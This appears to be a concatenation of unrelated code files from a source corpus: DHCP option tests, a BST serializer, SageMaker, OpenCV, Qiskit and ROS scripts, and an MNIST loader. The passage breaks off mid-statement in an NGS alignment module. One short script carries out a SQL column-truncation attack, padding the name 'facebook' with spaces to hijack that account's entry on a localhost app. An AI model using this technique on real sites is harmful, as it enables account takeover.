    # --- len() tracks replace/append/delete interplay.
    def test_OptionList_len1(self):
        self.assertEqual(
            len(self.gen_optionslist()),
            5
        )
    def test_OptionList_len2(self):
        opt_list = self.gen_optionslist()
        opt_list.insert(5, options.options.short_value_to_object(1, "255.255.255.0"))
        opt_list.append(options.options.short_value_to_object(2, 3600))
        del opt_list[5]
        opt_list.append(options.options.short_value_to_object(1, "255.255.255.0"))
        del opt_list[5]
        self.assertEqual(
            len(opt_list),
            6
        )
    # --- `in` accepts both raw option codes and option objects.
    def test_OptionList_contains1(self):
        self.assertEqual(
            57 in self.gen_optionslist(),
            True
        )
    def test_OptionList_contains2(self):
        self.assertEqual(
            1 in self.gen_optionslist(),
            False
        )
    def test_OptionList_contains3(self):
        self.assertEqual(
            options.options.short_value_to_object(57, 1500) in self.gen_optionslist(),
            True
        )
    def test_OptionList_contains4(self):
        self.assertEqual(
            options.options.short_value_to_object(2, 3600) in self.gen_optionslist(),
            False
        )
    # --- dict / JSON views use human-readable option names.
    def test_OptionList_as_dict(self):
        self.assertEqual(
            self.gen_optionslist().as_dict(),
            {'client_identifier': {'hwtype': 1, 'hwaddr': '8C:45:00:1D:48:16'}, 'max_dhcp_message_size': 1500, 'vendor_class_identifier': 'android-dhcp-9', 'hostname': 'Galaxy-S9', 'parameter_request_list': [1, 3, 6, 15, 26, 28, 51, 58, 59, 43]}
        )
    def test_OptionList_json(self):
        json_expected = (
            '{\n    "client_identifier": {\n        "hwtype": 1,\n        '
            '"hwaddr": "8C:45:00:1D:48:16"\n    },\n    "max_dhcp_message_'
            'size": 1500,\n    "vendor_class_identifier": "android-dhcp-9"'
            ',\n    "hostname": "Galaxy-S9",\n    "parameter_request_list"'
            ': [\n        1,\n        3,\n        6,\n        15,\n       '
            ' 26,\n        28,\n        51,\n        58,\n        59,\n   '
            '     43\n    ]\n}'
        )
        self.assertEqual(
            self.gen_optionslist().json,
            json_expected
        )
# Allow running this test module directly (``python <file>.py``).
if __name__ == "__main__":
    unittest.main()
| 12,534 | 4,657 |
"""Init file."""
from keras.legacy_tf_layers import migration_utils # pylint: disable=unused-import
| 102 | 35 |
# Definition for a binary tree node.
# class TreeNode:
# def __init__(self, x):
# self.val = x
# self.left = None
# self.right = None
class Codec:
    """Serialize a binary *search* tree to a space-separated preorder string
    and rebuild it from that string.

    ``TreeNode`` is referenced via string (forward-reference) annotations:
    the original bare names were evaluated at class-creation time, so the
    module raised NameError on import whenever TreeNode was defined only
    at runtime (here it exists solely as a comment).
    """
    def serialize(self, root: "TreeNode") -> str:
        """Encodes a tree to a single string.

        Returns "" for an empty tree.
        """
        def DFSPreorder(root):
            # Preorder alone is enough for a BST: value ordering fixes shape.
            return [root.val] + DFSPreorder(root.left) + DFSPreorder(root.right) if root else []
        return ' '.join(map(str, DFSPreorder(root)))
    def deserialize(self, data: str) -> "TreeNode":
        """Decodes your encoded data to tree.

        Rebuilds the BST by consuming preorder values while they fit the
        (minVal, maxVal) window implied by BST ordering.
        """
        if (data == ""):
            return None
        vals = [int(val) for val in data.split()]
        counter = 0  # index of the next preorder value to consume
        def buildTree(minVal, maxVal):
            nonlocal counter
            if counter >= len(vals):
                return None
            # Value outside this subtree's window belongs to an ancestor.
            if (vals[counter] < minVal or vals[counter] > maxVal):
                return None
            node = TreeNode(vals[counter])
            counter += 1
            node.left = buildTree(minVal, node.val)
            node.right = buildTree(node.val, maxVal)
            return node
        return buildTree(float("-inf"), float("inf"))
# Your Codec object will be instantiated and called as such:
# ser = Codec()
# deser = Codec()
# tree = ser.serialize(root)
# ans = deser.deserialize(tree)
# return ans | 1,485 | 431 |
import os
import sagemaker
from sagemaker import get_execution_role
from sagemaker.tensorflow.estimator import TensorFlow
# Launch a SageMaker TensorFlow training job for the mask-detection dataset.
sagemaker_session = sagemaker.Session()
# role = get_execution_role()
region = sagemaker_session.boto_session.region_name
# S3 locations of the pre-split training and validation data.
training_input_path = "s3://intel-edge-poc/mask_dataset_datagen/train/"
validation_input_path = "s3://intel-edge-poc/mask_dataset_datagen/val/"
# Hyperparameters forwarded to TrainingJob.py via script mode.
hyperparam = {
    "save_model_dir": "s3://intel-edge-poc/saved/",
    "batch_size": 32,
    "epochs": 2,
    "optimizer": "adam",
    "learning_rate": 1e-3,
}
#'train_dir': 'mask_dataset_datagen/train/',
#'val_dir': 'mask_dataset_datagen/val/'
#'bucket' : 'intel-edge-poc',
tf_estimator = TensorFlow(
    entry_point="TrainingJob.py",
    role="intel-edge-poc-role",
    instance_count=1,
    instance_type="ml.c4.xlarge",
    framework_version="2.3",
    py_version="py37",
    hyperparameters=hyperparam,
    script_mode=True,
)
# tf_estimator.fit()
# Channel names 'training'/'validation' become SM_CHANNEL_* env vars in the job.
tf_estimator.fit({"training": training_input_path, "validation": validation_input_path})
| 1,038 | 398 |
import numpy as np
import skimage
import skimage.morphology as morph
import skimage.filters as filt
import skimage.exposure as expo
def get_corrected_image(iimage, gamma=0.25):
    """Gamma-correct *iimage* to make dim spots easier to detect.

    The input is converted to a float image, then raised to *gamma*
    (values < 1 brighten dark regions).

    NOTE(review): for float inputs ``img_as_float`` may return the input
    array itself, in which case the in-place power mutates the caller's
    data -- confirm whether that is intended.
    """
    corrected = skimage.util.img_as_float(iimage)
    corrected **= gamma
    return corrected
| 314 | 107 |
# coding: utf-8
"""Test suite for our sysinfo utilities."""
# Copyright (c) yap_ipython Development Team.
# Distributed under the terms of the Modified BSD License.
import json
import nose.tools as nt
from yap_ipython.utils import sysinfo
def test_json_getsysinfo():
    """
    test that it is easily jsonable and don't return bytes somewhere.
    """
    info = sysinfo.get_sys_info()
    # json.dumps raises TypeError on bytes values, which is the real check.
    json.dumps(info)
| 398 | 129 |
from Pages.LoginPage import LoginPage
def test_invalid_login(setup):
    """Logging in with a wrong username must surface the invalid-login message."""
    page = LoginPage(setup)
    # Wrong username, correct password, then submit.
    page.enter_username_false()
    page.enter_password_true()
    page.click_login()
    # Assertion lives inside the page object.
    page.invalid_message_check()
    print("Correct Login Test Completed")
| 268 | 84 |
from pyimagesearch.shapedetector import ShapeDetector
from pyimagesearch.colorlabeler import ColorLabeler
import argparse
import imutils
import numpy as np
import cv2
import argparse
import imutils
# Webcam loop: threshold each frame, find external contours, and print the
# detected shape/colour of each. Press 'q' in the video window to quit.
face_cascade = cv2.CascadeClassifier('haarcascade_frontalface_default.xml')
if face_cascade.empty(): raise Exception("your face_cascade is empty. are you sure, the path is correct ?")
eye_cascade = cv2.CascadeClassifier('haarcascade_eye.xml')
if eye_cascade.empty(): raise Exception("your eye_cascade is empty. are you sure, the path is correct ?")
# NOTE(review): the cascades above are loaded but never used below -- confirm.
video = cv2.VideoCapture(0)
while(video.isOpened()):
    ret, frame = video.read()
    if frame is not None:
        # Work on a downscaled copy; ratio maps contours back to full size.
        resized = imutils.resize(frame,width=600)
        ratio=frame.shape[0] / float(resized.shape[0])
        blurred = cv2.GaussianBlur(resized, (5, 5), 0)
        gray = cv2.cvtColor(blurred, cv2.COLOR_BGR2GRAY)
        lab = cv2.cvtColor(blurred, cv2.COLOR_BGR2LAB)
        thresh = cv2.threshold(gray, 60, 255, cv2.THRESH_BINARY)[1]
        # find contours in the thresholded image and initialize the
        # shape detector
        cnts = cv2.findContours(thresh.copy(), cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_SIMPLE)
        # NOTE(review): findContours' return tuple differs between OpenCV
        # 2/3/4; this unpacking assumes OpenCV 3 when not cv2 -- confirm
        # against the installed version.
        cnts = cnts[0] if imutils.is_cv2() else cnts[1]
        sd = ShapeDetector()
        cl = ColorLabeler()
        # loop over the contours
        for c in cnts:
            # compute the center of the contour, then detect the name of the
            # shape using only the contour
            M = cv2.moments(c)
            #cX = int((M["m10"] / M["m00"]) * ratio)
            #cY = int((M["m01"] / M["m00"]) * ratio)
            shape = sd.detect(c)
            color = cl.label(lab, c)
            print(shape)
            print(color)
            # multiply the contour (x, y)-coordinates by the resize ratio,
            # then draw the contours and the name of the shape on the image
            c = c.astype("float")
            c *= ratio
            c = c.astype("int")
            cv2.drawContours(frame, [c], -1, (0, 255, 0), 2)
            #cv2.putText(frame, shape, (cX, cY), cv2.FONT_HERSHEY_SIMPLEX, 0.5, (255, 255, 255), 2)
        cv2.imshow('Video',frame)
    if cv2.waitKey(1) & 0xFF == ord('q'):
        break
video.release()
cv2.destroyAllWindows()
| 2,040 | 863 |
#!/usr/bin/env python
s = [n * (3 * n - 1) / 2 for n in range(0, 10000)]
found = False
i = 1900
while not found:
i += 1
j = 1
while j < i:
# actually, we cannot guarentee that j < i, the real condition would
# be s[i] < 3 * j + 1, which is the distance of s[j] and s[j + 1]. But
# this one is too time consuming.
print i, j
if (s[i] + s[j]) in s and (2 * s[j] + s[i]) in s:
print 'found', i, j
found = True
break
else:
j += 1
print s[i]
| 548 | 215 |
"""
Module providing ML anonymization.
This module contains methods for anonymizing ML model training data, so that when
a model is retrained on the anonymized data, the model itself will also be considered
anonymous. This may help exempt the model from different obligations and restrictions
set out in data protection regulations such as GDPR, CCPA, etc.
The module contains methods that enable anonymizing training datasets in a manner that
is tailored to and guided by an existing, trained ML model. It uses the existing model's
predictions on the training data to train a second, anonymizer model, that eventually determines
the generalizations that will be applied to the training data. For more information about the
method see: https://arxiv.org/abs/2007.13086
Once the anonymized training data is returned, it can be used to retrain the model.
"""
from apt.anonymization.anonymizer import Anonymize
| 911 | 227 |
from qiskit import QuantumRegister,QuantumCircuit
from qiskit.aqua.operators import StateFn
from qiskit.aqua.operators import I
from qiskit_code.quantumMethod import add,ini
from qiskit_code.classicalMethod import Dec2Bi
def DeutschJozsa(l,method):
    # Deutsch, D. and Jozsa, R., 1992. Rapid solution of problems by quantum computation.
    # Proceedings of the Royal Society of London. Series A: Mathematical and Physical Sciences,
    # 439(1907), pp.553-558.
    # The input 'l' is the equivalent to the 'N' in the original paper of
    # David Deutsch and Richard Jozsa, and 'method' denotes the 'unknown'
    # function, if you input 'balanced' then it will be balanced and otherwise
    # it will be constant.
    # Prints the expectation value <psi|I|phi> between the oracle circuit
    # state and a reference state prepared the same way.
    qr0=QuantumRegister(l)
    qr1=QuantumRegister(l+1)
    # One qubit larger to carry.
    ac=QuantumRegister(l) # Ancilla.
    t0=QuantumRegister(1)
    circ=QuantumCircuit(qr0,qr1,ac,t0)
    circ.h(qr0)
    if method=='balanced':
        print('balanced oracle')
        ini(circ,qr1,Dec2Bi(2**(l-1)))
    else:
        print('constant oracle')
        ini(circ,qr1,Dec2Bi(0))
    lst=range(l)
    QIN1=[qr0[i] for i in lst]+[qr1[i] for i in range(l+1)]+[ac[i] for i in lst]
    ADD=add(qr0,qr1,ac,l)
    circ.append(ADD,QIN1)# Role of the U unitary
    circ.cx(qr1[l],t0)# Role of the U unitary
    circ.z(t0)# The S unitary.
    circ.cx(qr1[l],t0)# Role of the U unitary
    circ.append(ADD.inverse(),QIN1)# Role of the U unitary
    psi=StateFn(circ)
    phiReg0=QuantumRegister(l)
    phiReg1=QuantumRegister(l+1)
    phiReg2=QuantumRegister(l)
    t1=QuantumRegister(1)
    phiCirc=QuantumCircuit(phiReg0,phiReg1,phiReg2,t1)
    phiCirc.h(phiReg0)
    if method=='balanced':
        # Fix: initialize the reference circuit's own register. The original
        # re-initialized circ/qr1 here (copy-paste error), so phiCirc's
        # second register was never prepared and circ was corrupted after
        # psi had been captured.
        ini(phiCirc,phiReg1,Dec2Bi(2**(l-1)))
    else:
        ini(phiCirc,phiReg1,Dec2Bi(0))
    phi=StateFn(phiCirc)
    operator=I.tensorpower(3*l+2)
    expectation_value=(~psi@operator@phi).eval()
    print(expectation_value)
#DeutschJozsa('constant')
#DeutschJozsa('balanced')
| 2,016 | 812 |
import requests
import random, string
# Random 16-char alphanumeric suffix so each run uses a fresh secret.
x = ''.join(random.choice(string.ascii_uppercase + string.ascii_lowercase + string.digits) for _ in range(16))
URL = "http://localhost/"
secret = "aA11111111" + x
# Registering a user
# NOTE(review): the 64 spaces padding in 'name' suggest a deliberate
# column-truncation/collision probe (CTF-style) -- confirm intent.
requests.post(url = "%s/add.php" % URL, data = {
    'name': 'facebook' + ' '*64 + 'abc',
    'secret': secret,
    'description': 'desc',
})
# Query the plain 'facebook' name with the same secret and print the reply.
r = requests.post(url = "%s/view.php" % URL, data = {
    'name': 'facebook',
    'secret': secret,
})
print(r.text)
| 480 | 188 |
import argparse
import sys
import traceback
from .app import Application
def new_excepthook(exc_type, exc_value, exc_tb):
    """Print the full traceback of an uncaught exception to stderr.

    Qt does not seem to output any errors by default; installing this hook
    makes them visible. The signature matches ``sys.excepthook`` (called
    positionally). Parameters renamed from ``type``/``value``/``tb`` to
    avoid shadowing the ``type`` builtin.
    """
    traceback.print_exception(exc_type, exc_value, exc_tb)

sys.excepthook = new_excepthook
def main():
    """Entry point: run the calculation headless with --no-gui, otherwise
    launch the Qt main window."""
    parser = argparse.ArgumentParser()
    parser.add_argument('--no-gui', action='store_true')
    options = parser.parse_args()
    app = Application()
    if options.no_gui:
        app.calculation(3)
        return
    # GUI imports are deferred so headless runs never require PyQt5.
    from PyQt5.QtWidgets import QApplication
    from .gui import MainWindow
    qt_app = QApplication(sys.argv)
    window = MainWindow(app)
    window.show()
    sys.exit(qt_app.exec_())
# Script entry point.
if __name__ == '__main__':
    main()
| 737 | 241 |
from unittest import TestCase
from exercicios.ex1030 import calcula_suicidio
import random
class TestEx1030(TestCase):
    """Exercises calcula_suicidio from exercise 1030."""

    def test_saida_com_erro_para_entradas_fora_do_intervalo(self):
        """Inputs outside the valid range are all reported as invalid."""
        entradas = [(0, 10), (10, 0), (10001, 10), (10, 1001)]
        esperado = (
            "Case 1: entrada inválida\n"
            "Case 2: entrada inválida\n"
            "Case 3: entrada inválida\n"
            "Case 4: entrada inválida\n"
        )
        self.assertEqual(esperado, calcula_suicidio(entradas))

    def test_saida_deve_retornar_case_1_3_para_entrada_5_2(self):
        """Valid inputs yield one numbered survivor line per case."""
        entradas = [(5, 2), (6, 3), (1234, 233)]
        esperado = "Case 1: 3\nCase 2: 1\nCase 3: 25\n"
        self.assertEqual(esperado, calcula_suicidio(entradas))
| 848 | 347 |
# -*- coding: utf-8 -*-
from json import load
from logging import basicConfig
from os.path import join, dirname
from pathlib import Path
################################################################################
# CHECKING THE INPUT AND OUTPUT AND DIRECTORY PATH
# INPUT
# Load configuration.json from the package's parent directory at import time.
with open(join(Path(dirname(__file__)).parent.absolute(), "configuration.json")) as json_configuration_file:
    CONFIG = load(json_configuration_file)
################################################################################
# SET LOG LEVEL
# basicConfig is a no-op if the root logger was already configured elsewhere.
basicConfig(level=CONFIG['debugLevel'],
            format="%(asctime)s [%(levelname)8s] %(message)s (%(filename)s:%(lineno)s)")
| 656 | 171 |
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
#
# Author: Lorand Cheng https://github.com/lorandcheng
# Date: Nov 15, 2020
# Project: USC EE250 Final Project, Morse Code Translator and Messenger
#
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
import json
import requests
from datetime import datetime
from pprint import pprint
class messageHandler:
    """HTTP client wrapper for the morse-code messaging server."""
    def __init__(self, name, serverAddress):
        """
        Summary: Class that manages the HTTP interactions with the messaging server
        Args:
            name (string): Name of node
            serverAddress (string): Target server to connect to in format ip_addr:port
        """
        self.name = name
        self.serverAddress = serverAddress
    def sendMessage(self, message):
        """
        Summary: Sends a POST message to the server
        Args:
            message (string): Content of the message
        Returns:
            int: 1 when the server answered HTTP 200, 0 otherwise.
        """
        headers = {
            'Content-Type': 'application/json',
            'Authorization': None # not using HTTP secure
        }
        payload = {
            'sender': self.name,
            'message': message,
            # NOTE(review): naive local time (no timezone); serialized via
            # default=str below -- confirm the server expects this format.
            'timestamp': datetime.now()
        }
        response = requests.post("http://{}/send-message".format(self.serverAddress),
                                 headers=headers,
                                 data=json.dumps(payload, indent=4, sort_keys=True, default=str))
        if response.status_code == 200:
            pprint(response.json())
            return 1
        else:
            return 0
    def getMessages(self,lastRead):
        """
        Summary: Sends a GET message to the server

        Args:
            lastRead: marker of the last message already read; forwarded
                to the server as the `lastRead` query parameter.
        Returns:
            requests.Response: raw response from /get-messages.
        """
        params = {
            'sender': self.name,
            'lastRead': lastRead
        }
        return requests.get("http://{}/get-messages".format(self.serverAddress), params=params)
    def getMessageHistory(self):
        """
        Summary: Sends a GET message to the server

        Returns:
            requests.Response: raw response from /history.
        """
        params = {
            'sender': self.name
        }
        return requests.get("http://{}/history".format(self.serverAddress), params=params)
| 2,177 | 620 |
# -*- coding: utf-8 -*-
import random
from random_words import RandomWords
from random_words import LoremIpsum
from django.core.management.base import BaseCommand
from app.models import Tag
from app.models import Post
class Command(BaseCommand):
    """Populate the database with random Tags and Posts for testing.

    NOTE(review): uses ``xrange`` and print statements, so this management
    command runs only under Python 2.
    """
    def __init__(self):
        super(Command, self).__init__()
        self.rw = RandomWords()
        self.li = LoremIpsum()
        # Number of random tags attached to each generated post.
        self.array_size = 2
    def handle(self, *args, **options):
        """Create up to 20000 unique tags, then up to 100000 posts."""
        tags = []
        for i in xrange(20000):
            name = self.make_name()
            # get_or_create: random name collisions simply skip creation.
            tag, created = Tag.objects.get_or_create(name=name)
            if created:
                tags.append(tag)
        print '{0} tags has been created.'.format(len(tags))
        posts = []
        tags_ids = Tag.objects.all().values_list('id', flat=True)
        if self.array_size < len(tags_ids):
            for i in xrange(100000):
                name = self.make_name()
                # Pick array_size distinct tag ids for this post.
                rand = random.sample(tags_ids, self.array_size)
                # NOTE(review): passing a many-to-many field ('tags') inside
                # `defaults` to get_or_create is rejected by modern Django;
                # confirm the Post model/manager actually supports this.
                post, created = Post.objects.get_or_create(
                    name=name,
                    defaults={
                        'tags': rand,
                        'description': self.li.get_sentences(5),
                    }
                )
                if created:
                    posts.append(post)
            print '{0} posts has been created.'.format(len(posts))
        else:
            print 'Please generate more tags than {0}.'.format(self.array_size)
    def make_name(self):
        """Return a capitalized random word with a random 1-10 suffix."""
        name = self.rw.random_word().capitalize()
        name = '{0}{1}'.format(name, random.randint(1, 10))
        return name
| 1,637 | 479 |
import numpy as np
import os
class Dataset():
    """Pairs an image array with its labels.

    Pixel values are rescaled from [0, 255] to [0.0, 1.0] (float32) when
    the dataset is constructed; labels are stored as given.
    """

    def __init__(self, images, labels):
        # Normalize to float32 in [0, 1] so models see unit-range inputs.
        scaled = np.multiply(images.astype(np.float32), 1.0 / 255.0)
        self._images = scaled
        self._labels = labels

    @property  # getter
    def images(self):
        """Normalized float32 image array."""
        return self._images

    @property
    def labels(self):
        """Label array exactly as passed in (not copied)."""
        return self._labels
def extract_images(image_dir, name):
    """Load an IDX3 image file and return a (N, 1, 28, 28) uint8 array.

    Skips the 16-byte IDX header (magic, count, rows, cols) and reads at
    most 60000 28x28 images; N is however many complete images follow.
    """
    # 'with' guarantees the file handle is closed (the original leaked it).
    with open(os.path.join(image_dir, name), 'rb') as files:
        files.read(16)  # discard IDX header
        buf = files.read(28 * 28 * 60000)
    images = np.frombuffer(buf, dtype=np.uint8)
    # images = images.reshape(-1, 784)
    # NCHW layout: (count, channels=1, height, width).
    images = images.reshape(-1, 1, 28, 28)
    return images
def extract_labels(image_dir, name):
    """Load an IDX1 label file and return a 1-D uint8 label array.

    Skips the 8-byte IDX header (magic, count) and parses the remaining
    bytes as one label each.
    """
    # 'with' guarantees the file handle is closed (the original leaked it).
    with open(os.path.join(image_dir, name), 'rb') as files:
        files.read(8)  # discard IDX header
        # NOTE(review): 28*28*10000 is an odd cap for 1-byte labels; it
        # merely bounds the read and exceeds any MNIST label file size.
        buf = files.read(28 * 28 * 10000)
    labels = np.frombuffer(buf, dtype=np.uint8)
    return labels
def read_data_sets(image_dir):
    """Read the MNIST files in *image_dir* into train/validation/test splits.

    Returns an object with ``train``, ``validation`` and ``test``
    attributes, each a Dataset. The first VALIDATION_SIZE training
    samples form the validation split; the remainder is training.
    """
    class DataSets():
        pass
    data_sets = DataSets()
    TRAIN_IMAGES = 'train-images-idx3-ubyte'
    TRAIN_LABELS = 'train-labels-idx1-ubyte'
    TEST_IMAGES = 't10k-images-idx3-ubyte'
    TEST_LABELS = 't10k-labels-idx1-ubyte'
    VALIDATION_SIZE = 5000
    train_images = extract_images(image_dir, TRAIN_IMAGES)
    train_labels = extract_labels(image_dir, TRAIN_LABELS)
    # Carve the validation split off FIRST, then remove it from training.
    # (The original sliced training first and took validation from the
    # remainder, so validation duplicated training samples 5000..9999 --
    # an overlapping, leaking split.)
    validation_images = train_images[:VALIDATION_SIZE]
    validation_labels = train_labels[:VALIDATION_SIZE]
    train_images = train_images[VALIDATION_SIZE:]
    train_labels = train_labels[VALIDATION_SIZE:]
    test_images = extract_images(image_dir, TEST_IMAGES)
    test_labels = extract_labels(image_dir, TEST_LABELS)
    data_sets.train = Dataset(train_images, train_labels)
    data_sets.validation = Dataset(validation_images, validation_labels)
    data_sets.test = Dataset(test_images, test_labels)
    return data_sets
#!/usr/bin/env python
"""Waypoint Updater.
This node will publish waypoints from the car's current position to some `x` distance ahead.
As mentioned in the doc, you should ideally first implement a version which does not care
about traffic lights or obstacles.
Once you have created dbw_node, you will update this node to use the status of traffic lights too.
Please note that our simulator also provides the exact location of traffic lights and their
current status in `/vehicle/traffic_lights` message. You can use this message to build this node
as well as to verify your TL classifier.
TODO:
- Stopline location for each traffic light.
"""
import rospy
from geometry_msgs.msg import PoseStamped, TwistStamped
from styx_msgs.msg import Lane, Waypoint
from std_msgs.msg import Int32
import tf
from scipy.spatial import KDTree
import numpy as np
import math
LOOKAHEAD_WPS = 100 # Number of waypoints we will publish. You can change this number
MAX_DECEL = 1. # max. allowed deceleration
### Deceleration profile functions:
# Proposal by Udacity-walkthrough for deceleration profile:
def deceleration_sqrt(dist):
    """Square-root braking profile: speed grows as sqrt of distance to stop.

    The walkthrough originally scaled by 2 * MAX_DECEL; 0.05 gives a much
    gentler ramp.
    """
    scaled = 0.05 * MAX_DECEL * dist
    return math.sqrt(scaled)
# Further scaling of profile will be necessary later (still untested, 30/03/2018)
def deceleration_sigmoid(dist):
    """Logistic braking profile: maps distance to a speed in (0, 1)."""
    return 1 / (1 + math.exp(-dist))
# Further scaling of profile will be necessary later (still untested 30/03/2018)
def deceleration_atan(dist):
    """Arctangent braking profile, shifted so the knee sits ~10 units out."""
    shifted = dist - 10.
    return math.atan(shifted) + 0.5 * math.pi
class WaypointUpdater(object):
    """ROS node publishing the next LOOKAHEAD_WPS waypoints ahead of the car.

    Consumes the car pose, the static track waypoints and the index of the
    waypoint nearest a red light's stop line; republishes a trimmed
    /final_waypoints Lane whose velocities are shaped for braking when a
    stop is required.
    """

    def __init__(self):
        rospy.init_node('waypoint_updater', log_level=rospy.DEBUG)
        rospy.Subscriber('/current_pose', PoseStamped, self.pose_cb) # Provides the Vehicles Current Position
        rospy.Subscriber('/base_waypoints', Lane, self.waypoints_cb) # Provides a complete list of waypoints the car will be following
        rospy.Subscriber('/traffic_waypoint', Int32, self.traffic_cb) # Get the position of the closest waypoint to a Red Light Stop
        # TODO: Add a subscriber for /traffic_waypoint and /obstacle_waypoint below
        self.final_waypoints_pub = rospy.Publisher('/final_waypoints', Lane, queue_size=1)
        # TODO: Add other member variables you need below
        self.current_pose = None      # latest PoseStamped from /current_pose
        self.base_waypoints = None    # full static Lane from /base_waypoints
        self.waypoints_2d = None      # [[x, y], ...] extracted from base waypoints
        self.waypoint_tree = None     # KDTree built over waypoints_2d
        self.stopline_wp_idx = -1     # -1 means no red light ahead
        self.loop()

    def loop(self):
        """Main publishing loop; runs at a fixed rate until node shutdown."""
        rate = rospy.Rate(50) # 50Hz
        while not rospy.is_shutdown():
            # rospy.logdebug("current_pose: {}".format(self.current_pose is not None))
            # rospy.logdebug("base_waypoints: {}".format(self.base_waypoints is not None))
            # rospy.logdebug("waypoint_tree: {}".format(self.waypoint_tree is not None))
            # Wait until both the pose and waypoint callbacks have fired once.
            if self.current_pose is not None and self.base_waypoints is not None and self.waypoint_tree is not None:
                #get closest waypoint
                closest_waypoint_idx = self.get_closest_waypoint_idx()
                self.publish_waypoints(closest_waypoint_idx)
            rate.sleep()

    def get_closest_waypoint_idx(self):
        """Return the index of the closest base waypoint AHEAD of the car."""
        x = self.current_pose.pose.position.x
        y = self.current_pose.pose.position.y
        # KDTree.query returns (distance, index); keep the index.
        closest_idx = self.waypoint_tree.query([x,y],1)[1]
        #check if closes waypoint is ahead or behind vehicle
        closest_coord = self.waypoints_2d[closest_idx]
        prev_coord = self.waypoints_2d[closest_idx-1]
        # Equation for hyperplane through closest_coords
        cl_vect = np.array(closest_coord)
        prev_vect = np.array(prev_coord)
        pos_vect = np.array([x, y])
        val = np.dot(cl_vect - prev_vect, pos_vect - cl_vect)
        # Positive dot product -> the car is already past the closest
        # waypoint, so advance one index (wrapping at the track's end).
        if val > 0:
            closest_idx = (closest_idx + 1) % len(self.waypoints_2d)
        return closest_idx

    def publish_waypoints(self, closest_idx):
        """Publish the LOOKAHEAD_WPS waypoints starting at closest_idx."""
        lane = Lane()
        lane.header = self.base_waypoints.header
        farthest_idx = closest_idx + LOOKAHEAD_WPS
        lane.waypoints = self.base_waypoints.waypoints[closest_idx:farthest_idx]
        # Impose deceleration profile onto waypoints if traffic light is detected
        # and within range (i.e. nearer than farthest_idx)
        if self.stopline_wp_idx != -1 and (self.stopline_wp_idx < farthest_idx):
            lane.waypoints = self.decelerate(lane.waypoints, closest_idx)
        self.final_waypoints_pub.publish(lane)

    # Imposes deceleration profile if traffic light or object is detected on trajectory
    def decelerate(self, waypoints, closest_idx):
        """Return copies of waypoints with velocities shaped to stop at the line."""
        temp = []
        for i, wp in enumerate(waypoints):
            p = Waypoint()
            p.pose = wp.pose
            # Deceleration profile is a sqrt function
            stop_idx = max(self.stopline_wp_idx - closest_idx - 1, 0) # Center of the car will be beind the line rather than right on
            dist = self.distance(waypoints, i, stop_idx)
            vel = deceleration_sqrt(dist)
            # Alternative profile functions (try out later):
            # vel = deceleration_sigmoid(dist)
            # vel = deceleration_atan(dist)
            # Snap crawl speeds to a full stop.
            if vel < 1.:
                vel = 0.
            # Never exceed the waypoint's original target speed.
            p.twist.twist.linear.x = min(vel, wp.twist.twist.linear.x)
            temp.append(p)
        return temp

    def pose_cb(self, msg):
        """Cache the latest vehicle pose (PoseStamped)."""
        self.current_pose = msg

    def waypoints_cb(self, msg):
        """Cache the static track waypoints and build the KD-tree once."""
        self.base_waypoints = msg
        if not self.waypoints_2d:
            self.waypoints_2d = [[waypoint.pose.pose.position.x, waypoint.pose.pose.position.y]
                                 for waypoint in self.base_waypoints.waypoints]
            self.waypoint_tree = KDTree(self.waypoints_2d)

    def traffic_cb(self, msg):
        # TODO: Callback for /traffic_waypoint message. Implement
        # Index of the waypoint at the next red light's stop line (-1 = none).
        self.stopline_wp_idx = msg.data;
        # pass

    def obstacle_cb(self, msg):
        # TODO: Callback for /obstacle_waypoint message. We will implement it later
        pass

    def get_waypoint_velocity(self, waypoint):
        """Return the target linear velocity stored in a single waypoint."""
        return waypoint.twist.twist.linear.x

    def set_waypoint_velocity(self, waypoints, waypoint, velocity):
        """Set the target linear velocity of waypoints[waypoint] in place."""
        waypoints[waypoint].twist.twist.linear.x = velocity

    def distance(self, waypoints, wp1, wp2):
        """Sum of Euclidean segment lengths along waypoints from wp1 to wp2.

        Returns 0 when wp2 < wp1 (empty range).
        """
        dist = 0
        dl = lambda a, b: math.sqrt((a.x-b.x)**2 + (a.y-b.y)**2 + (a.z-b.z)**2)
        for i in range(wp1, wp2+1):
            # Accumulates consecutive segment lengths: wp1 is advanced to i
            # each iteration, so each term is one hop along the path.
            dist += dl(waypoints[wp1].pose.pose.position, waypoints[i].pose.pose.position)
            wp1 = i
        return dist
if __name__ == '__main__':
    try:
        WaypointUpdater()
    except rospy.ROSInterruptException:
        # Raised when ROS shuts down while the node is initialising/looping.
        rospy.logerr('Could not start waypoint updater node.')
| 6,764 | 2,206 |
# renames duplicate columns by suffixing _1, _2 etc
class renamer():
    """Stateful callable that de-duplicates repeated column labels.

    The first occurrence of a label is returned unchanged; each later
    occurrence gets a numeric suffix (_1, _2, ...). Intended for use as
    df.rename(columns=renamer()).
    """

    def __init__(self):
        # Tracks how many times each label has been seen so far.
        self.d = dict()

    def __call__(self, x):
        if x in self.d:
            self.d[x] += 1
            return "%s_%d" % (x, self.d[x])
        self.d[x] = 0
        return x
| 305 | 107 |
'''
sbc-ngs (c) University of Manchester 2019
All rights reserved.
@author: neilswainston
'''
# pylint: disable=no-member
# pylint: disable=too-few-public-methods
# pylint: disable=too-many-arguments
# pylint: disable=too-many-instance-attributes
# pylint: disable=unused-argument
# pylint: disable=wrong-import-order
from __future__ import division
import os
import subprocess
import sys
import uuid
import multiprocessing as mp
import pandas as pd
from sbc_ngs import demultiplex, results, utils, vcf_utils
class PathwayAligner():
    '''Class to align NGS data to pathways.

    Demultiplexes reads by barcode, aligns them against indexed template
    sequences with bwa (via _score_alignment) and aggregates the results
    through a ResultsThread.
    '''

    def __init__(self, out_dir, in_dir, seq_files, min_length, max_read_files):
        # Initialise project directory:
        self.__out_dir = out_dir
        if not os.path.exists(self.__out_dir):
            os.makedirs(self.__out_dir)
        self.__in_dir = in_dir
        self.__seq_files = seq_files          # {seq_id: template fasta path}
        self.__min_length = min_length        # minimum read length to keep
        self.__max_read_files = max_read_files
        # Barcodes are read from in_dir/barcodes.csv.
        self.__barcodes, self.__barcodes_df = \
            demultiplex.get_barcodes(os.path.join(in_dir, 'barcodes.csv'))
        # Backwards compatibility:
        self.__barcodes_df.rename(columns={'actual_ice_id': 'known_seq_id'},
                                  inplace=True)
        self.__barcodes_df['known_seq_id'] = \
